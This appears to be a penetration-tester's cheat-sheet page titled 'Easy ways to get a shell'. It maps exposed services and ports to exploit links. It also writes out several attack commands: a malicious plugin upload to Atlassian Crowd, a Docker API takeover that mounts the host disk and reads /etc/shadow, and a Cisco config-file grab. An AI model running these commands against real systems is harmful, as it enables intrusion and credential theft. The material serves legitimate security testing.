Low-Hanging Fruit

Easy ways to get a shell

Services

Adobe ColdFusion BlazeDS

Ports: 8080 Exploit:

Adobe ColdFusion BlazeDS Java Object Deserialization RCEwww.tenable.com

Adobe Coldfusion 11.0.03.292866 - BlazeDS Java Object Deserialization Remote Code ExecutionExploit Database

Apache Flink

Ports: 5000 Exploit:

Rapid7Rapid7

Apache Flink 1.9.x - File Upload RCE (Unauthenticated)Exploit Database

Apache Hadoop

Ports: 8088 Exploit:

Rapid7Rapid7

vulhub/hadoop/unauthorized-yarn/exploit.py at master · vulhub/vulhubGitHub

Apache Solr

Ports: 8983 Exploit:

GitHub - jas502n/solr_rce: Apache Solr RCE via Velocity templateGitHub

GitHub - Imanfeng/Apache-Solr-RCE: Apache Solr Exploits 🌟GitHub

Apache Spark

Ports: 6066 Exploit:

GitHub - ivanitlearning/CVE-2018-11770: Python RCE exploit for Apache Spark rewritten from Metasploit moduleGitHub

Rapid7Rapid7

Atlassian Crowd

Ports: 4990 Exploit:

curl -k -H "Content-Type: multipart/mixed" \ --form "[email protected]" http://[HOST]:4990/crowd/admin/uploadplugin.action

Triggered!*(#*!(#*!packetstormsecurity.com

Cisco Smart Install

Ports: 4786 Exploit:

Rapid7Rapid7

GitHub - frostbits-security/SIET: Smart Install Exploitation ToolGitHub

Cisco Unified Communications Manager

Ports: 6970 Exploit:

curl http://[CUCM IP Address]:6970/ConfigFileCacheList.txt

GitHub - trustedsec/SeeYouCM-ThiefGitHub

Dameware

Ports: 6129 Exploit:

SolarWinds Dameware Mini Remote Control Unauthenticated RCETenable®

poc/Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py at master · tenable/pocGitHub

Dell iDrac

Ports: 443

Exploit:

Rapid7Rapid7

Docker API

Ports: 2375 Exploit:

docker -H [host]:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

File Access: cat /mnt/etc/shadow
Remote Code Execution: chroot /mnt

GlassFish

Ports: 4848 Exploit:

Rapid7Rapid7

Hashicorp Consul

Ports: 8500 Exploit:

Rapid7Rapid7

HP Data Protector

Ports: 5555, 5556 Exploit:

Rapid7Rapid7

HP iLO

Ports: 80, 443

Exploit:

CVE-2017-12542/exploit_1.py at master · skelsec/CVE-2017-12542GitHub

IBM Websphere

Ports: 8880 Exploit:

Rapid7Rapid7

IPMI

Ports: 623 Exploit:

Rapid7Rapid7

Java RMI

Ports: 1090, 1098, 1099, 4444, 11099, 47001, 47002, 10999 Exploit:

Rapid7Rapid7

https://itnext.io/java-rmi-for-pentesters-structure-recon-and-communication-non-jmx-registries-a10d5c996a79itnext.io

https://itnext.io/java-rmi-for-pentesters-part-two-reconnaissance-attack-against-non-jmx-registries-187a6561314ditnext.io

JBoss

Ports: 4444, 4445, 11111 Exploit:

Rapid7Rapid7

GitHub - joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation ToolGitHub

JDWP

Ports: 5005 - 5009, 45000, 45001 Exploit:

Rapid7Rapid7

GitHub - IOActive/jdwp-shellifierGitHub

JMX

Ports: 8686, 9012, 50500 Exploit:

Rapid7Rapid7

MS17-010: Eternal Blue

Ports 139, 445

Exploit:

nmap -Pn -sV --script smb-vuln-ms17-010 -p139,445 $ip

Rapid7Rapid7

Portainer

Ports: 9000 Exploit:

GitHub - MauroEldritch/PAZUZU: PAZUZU (Portainer Authentication Zap Using Zero Utilities) is a ruby exploit for vulnerable Portainer instances (--no-auth). Featured @ DevFest Siberia 2018.GitHub

GitHub - MauroEldritch/lempo: LEMPO (Ldap Exposure on POrtainer) is an exploit for CVE-2018-19466 (LDAP Credentials Disclosure on Portainer). Featured @ DevFest Siberia 2018GitHub

PrintNightmare

crackmapexec smb $host_file -u $username -p $password -M spooler

GitHub - cube0x0/CVE-2021-1675: C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527GitHub

Redis

Ports: 6379 Exploit:

Rapid7Rapid7

SAP

Ports: 3300 Exploit:

GitHub - chipik/SAP_GW_RCE_exploit: SAP Gateway RCE exploitsGitHub

WebLogic

Ports: 7000-7004, 7070, 7071, 8000-8003, 9000-9003, 9503 Exploit:

OffSec’s Exploit Database Archivewww.exploit-db.com

Zoho Manageengine Desktop

Ports: 8383 Exploit:

https://srcincite.io/pocs/src-2020-0011.py.txtsrcincite.io

References

GitHub - trustedsec/spoonmapGitHub

PreviousTimestomping NextNetworks

Last updated 2 years ago